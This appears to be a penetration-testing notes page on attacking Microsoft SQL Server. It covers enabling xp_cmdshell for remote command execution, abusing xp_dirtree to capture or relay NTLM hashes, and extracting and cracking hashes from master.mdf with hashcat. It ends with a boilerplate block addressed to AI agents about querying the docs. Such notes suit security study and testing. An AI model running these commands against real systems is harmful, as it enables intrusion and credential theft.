# MSSQL

Microsoft SQL is similar to other SQL databases and it can be accessed using a '*<mark style="color:blue;">sqsh</mark>*' tool.

```
sqsh -S 10.11.1.31 -U test -P "password"
```

## Remote Shell - XP\_Cmdshell

Remote commands can be executed on the MSSQL hosting system through the sqsh tool.&#x20;

The following command can be used to enable xp\_cmdshell,

```
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
```

The following command can be used to execute commands on the remote system,

```
xp_cmdshell 'whoami';
go
```

{% embed url="<https://alamot.github.io/mssql_shell/>" %}

If there is trouble in enabling the xp\_cmdshell, then you can try to disable and re-enable it using the following commands,

```
--Disable
Use Master

GO
EXEC master.dbo.sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE

GO

EXEC master.dbo.sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
GO

-- Enable
Use Master
GO
EXEC master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
GO

EXEC master.dbo.sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
GO
```

## XP\_Dirtree

This is another undocumented stored procedure within MSSQL that can be used for listing out the files and directories. This command lists the following three parameters,

Files - This will display the files present in the folder

Directory - This is the directory that you pass to the command

Depth - This displays the number of sub level folders

```
xp_dirtree <foldername>
```

{% hint style="info" %}
This command comes in handy when you want to trigger an SMB connection through it to a locally hosted SMB server (Impacket-smbserver/NTLMrelayx) and catch the user hash or relay it.&#x20;
{% endhint %}

## Master Database File

The master.mdf file records all system level information for a SQL Database. It also contains instance wide meta data such as logon info, endpoints, linked servers and system configuration settings. It also records the existences of all databases and the location of all files.&#x20;

However, this file cannot be accessed while the database is running as MSSQL processes creates a lock on it. But if you do have access to it, then the login credentials can be extracted from it.

The passwords are hashed and stored in the file, however they can be extracted using the following method and the hash can be cracked using hashcat.

{% embed url="<https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes>" %}

The above script can be used for extracting the hashes. If you are on a Linux system, then you can use Pwsh to run the powershell script.

The has can be cracked as follows,

```
hashcat -a 0 -m 1731 hash /usr/share/wordlists/rockyou.txt --show
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.particle42.com/services/mssql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.